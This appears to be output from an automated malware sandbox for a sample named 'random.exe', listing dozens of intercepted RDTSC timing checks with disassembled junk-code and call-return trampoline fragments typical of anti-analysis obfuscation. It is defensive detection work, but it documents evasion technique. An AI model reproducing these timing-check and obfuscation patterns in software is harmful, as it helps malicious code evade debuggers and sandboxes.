Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1059336 second address: 1059344 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jp 00007F980CCD2246h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10293A9 second address: 10293CE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F980CD044E4h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007F980CD044D6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10293CE second address: 10293E6 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F980CCD2246h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F980CCD224Eh 0x00000010 jnc 00007F980CCD2246h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1063CF5 second address: 1063CFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1063E9C second address: 1063EAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F980CCD2246h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1063EAB second address: 1063EAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1063EAF second address: 1063ED8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F980CCD2255h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F980CCD224Ch 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1067FDD second address: 1067FF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F980CD044DEh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 106BA6B second address: 106BA71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 106BA71 second address: 106BA75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 106BA75 second address: 106BA89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F980CCD2246h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F980CCD2246h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 106BA89 second address: 106BAA5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F980CD044D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007F980CD044DEh 0x00000014 jno 00007F980CD044D6h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 106F94B second address: 106F94F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 106F94F second address: 106F972 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F980CD044E9h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 106F972 second address: 106F976 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 106F976 second address: 106F97A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 106EF18 second address: 106EF1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 106EF1E second address: 106EF2B instructions: 0x00000000 rdtsc 0x00000002 jl 00007F980CD044D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 106F0A0 second address: 106F0A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1070CEB second address: 1070CF1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1070CF1 second address: 1070D19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F980CCD2255h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jno 00007F980CCD2248h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1070D9D second address: 1070DED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 add dword ptr [esp], 6A396287h 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F980CD044D8h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 0000001Ah 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 or edi, dword ptr [ebp+122D3AA5h] 0x0000002f call 00007F980CD044D9h 0x00000034 push esi 0x00000035 push ebx 0x00000036 je 00007F980CD044D6h 0x0000003c pop ebx 0x0000003d pop esi 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1070DED second address: 1070DF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1070DF2 second address: 1070DFC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F980CD044DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1070DFC second address: 1070E0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1070E0B second address: 1070E12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10710FC second address: 107110B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F980CCD224Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1071260 second address: 1071264 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10712F4 second address: 10712FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10713A3 second address: 10713A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1071933 second address: 107193E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F980CCD2246h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 107193E second address: 1071956 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], ebx 0x0000000d xor dword ptr [ebp+122D1E78h], edi 0x00000013 push eax 0x00000014 pushad 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1071956 second address: 1071963 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jnp 00007F980CCD224Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1071B6B second address: 1071B81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F980CD044DEh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1071D97 second address: 1071DBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F980CCD2258h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jc 00007F980CCD2246h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1071E68 second address: 1071E7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F980CD044D6h 0x0000000a popad 0x0000000b pop esi 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jnc 00007F980CD044D8h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1071E7F second address: 1071E84 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1071F03 second address: 1071F29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 jnp 00007F980CD044E0h 0x0000000f nop 0x00000010 mov dword ptr [ebp+122D298Ch], edi 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1071F29 second address: 1071F2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1072418 second address: 1072426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1072426 second address: 107242B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1072E18 second address: 1072E1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1072E1C second address: 1072E34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jl 00007F980CCD2246h 0x0000000d pop edx 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 push ecx 0x00000012 pushad 0x00000013 popad 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1074A52 second address: 1074A56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1074A56 second address: 1074A5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1075427 second address: 107542C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 107542C second address: 107543A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 107543A second address: 107545A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F980CD044E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 107545A second address: 10754B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F980CCD2250h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F980CCD2248h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 push 00000000h 0x00000029 push eax 0x0000002a mov di, F2EAh 0x0000002e pop edi 0x0000002f push eax 0x00000030 pushad 0x00000031 jmp 00007F980CCD2254h 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10754B6 second address: 10754BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102C901 second address: 102C905 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102C905 second address: 102C921 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F980CD044E6h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 102C921 second address: 102C937 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F980CCD224Ah 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F980CCD2246h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1077C07 second address: 1077C0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 107866D second address: 1078671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1078671 second address: 107869A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F980CD044E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F980CD044DDh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1079209 second address: 107920F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 107920F second address: 1079214 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 107D1A3 second address: 107D200 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push eax 0x0000000a call 00007F980CCD2248h 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 add dword ptr [esp+04h], 00000015h 0x0000001c inc eax 0x0000001d push eax 0x0000001e ret 0x0000001f pop eax 0x00000020 ret 0x00000021 mov bx, cx 0x00000024 push 00000000h 0x00000026 mov dword ptr [ebp+122D37E1h], edi 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push eax 0x00000031 call 00007F980CCD2248h 0x00000036 pop eax 0x00000037 mov dword ptr [esp+04h], eax 0x0000003b add dword ptr [esp+04h], 0000001Ah 0x00000043 inc eax 0x00000044 push eax 0x00000045 ret 0x00000046 pop eax 0x00000047 ret 0x00000048 mov bx, si 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e push edx 0x0000004f pushad 0x00000050 popad 0x00000051 pop edx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 107D200 second address: 107D219 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F980CD044E5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 107D3F0 second address: 107D3FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F980CCD2246h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 107E2DA second address: 107E34D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F980CD044E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F980CD044D8h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000019h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 mov bx, 9200h 0x0000002a sub dword ptr [ebp+122D3729h], esi 0x00000030 push dword ptr fs:[00000000h] 0x00000037 cld 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f mov edi, dword ptr [ebp+122D3BE1h] 0x00000045 mov eax, dword ptr [ebp+122D05CDh] 0x0000004b pushad 0x0000004c add dword ptr [ebp+1244FE0Eh], ecx 0x00000052 popad 0x00000053 push FFFFFFFFh 0x00000055 mov edi, esi 0x00000057 nop 0x00000058 push eax 0x00000059 push edx 0x0000005a push edi 0x0000005b pushad 0x0000005c popad 0x0000005d pop edi 0x0000005e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 107E34D second address: 107E369 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F980CCD2258h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10802CA second address: 10802CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 107F30B second address: 107F310 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 107F310 second address: 107F38D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov bx, BA55h 0x0000000e push dword ptr fs:[00000000h] 0x00000015 mov dword ptr [ebp+122D308Dh], ecx 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 mov dword ptr [ebp+122D251Eh], edx 0x00000028 mov eax, dword ptr [ebp+122D01E1h] 0x0000002e push 00000000h 0x00000030 push esi 0x00000031 call 00007F980CD044D8h 0x00000036 pop esi 0x00000037 mov dword ptr [esp+04h], esi 0x0000003b add dword ptr [esp+04h], 0000001Bh 0x00000043 inc esi 0x00000044 push esi 0x00000045 ret 0x00000046 pop esi 0x00000047 ret 0x00000048 push FFFFFFFFh 0x0000004a push 00000000h 0x0000004c push ebp 0x0000004d call 00007F980CD044D8h 0x00000052 pop ebp 0x00000053 mov dword ptr [esp+04h], ebp 0x00000057 add dword ptr [esp+04h], 00000018h 0x0000005f inc ebp 0x00000060 push ebp 0x00000061 ret 0x00000062 pop ebp 0x00000063 ret 0x00000064 mov bh, CDh 0x00000066 nop 0x00000067 push eax 0x00000068 push edx 0x00000069 pushad 0x0000006a pushad 0x0000006b popad 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 107F38D second address: 107F392 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 107F392 second address: 107F3B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F980CD044E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007F980CD044D6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1081210 second address: 1081270 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F980CCD2248h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F980CCD2248h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 mov bx, di 0x0000002c jp 00007F980CCD2248h 0x00000032 push 00000000h 0x00000034 mov edi, 15904088h 0x00000039 push 00000000h 0x0000003b movsx ebx, ax 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F980CCD2253h 0x00000046 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 108221F second address: 10822A6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F980CD044D8h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 movsx edi, bx 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push edi 0x0000002d call 00007F980CD044D8h 0x00000032 pop edi 0x00000033 mov dword ptr [esp+04h], edi 0x00000037 add dword ptr [esp+04h], 0000001Bh 0x0000003f inc edi 0x00000040 push edi 0x00000041 ret 0x00000042 pop edi 0x00000043 ret 0x00000044 call 00007F980CD044DEh 0x00000049 mov dword ptr [ebp+1244F491h], eax 0x0000004f pop ebx 0x00000050 push 00000000h 0x00000052 stc 0x00000053 xchg eax, esi 0x00000054 jc 00007F980CD044E0h 0x0000005a push eax 0x0000005b ja 00007F980CD044DEh 0x00000061 push edi 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1082459 second address: 108245F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10840D7 second address: 10840DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10840DD second address: 10840F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F980CCD2255h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10840F7 second address: 1084148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007F980CD044D8h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 movsx ebx, dx 0x00000025 push 00000000h 0x00000027 add dword ptr [ebp+122D2582h], esi 0x0000002d push 00000000h 0x0000002f ja 00007F980CD044DCh 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F980CD044DDh 0x0000003d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 108715B second address: 10871C7 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F980CCD224Ch 0x00000008 jbe 00007F980CCD2246h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 jmp 00007F980CCD2256h 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push edi 0x0000001b call 00007F980CCD2248h 0x00000020 pop edi 0x00000021 mov dword ptr [esp+04h], edi 0x00000025 add dword ptr [esp+04h], 00000018h 0x0000002d inc edi 0x0000002e push edi 0x0000002f ret 0x00000030 pop edi 0x00000031 ret 0x00000032 mov edi, dword ptr [ebp+122D3935h] 0x00000038 push 00000000h 0x0000003a and ebx, dword ptr [ebp+122D3293h] 0x00000040 xchg eax, esi 0x00000041 push esi 0x00000042 jne 00007F980CCD224Ch 0x00000048 pop esi 0x00000049 push eax 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d push edx 0x0000004e pop edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10880FB second address: 10880FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10880FF second address: 1088105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 108B396 second address: 108B3A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F980CD044DAh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 108B3A5 second address: 108B3B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F980CCD2246h 0x00000009 jnc 00007F980CCD2246h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
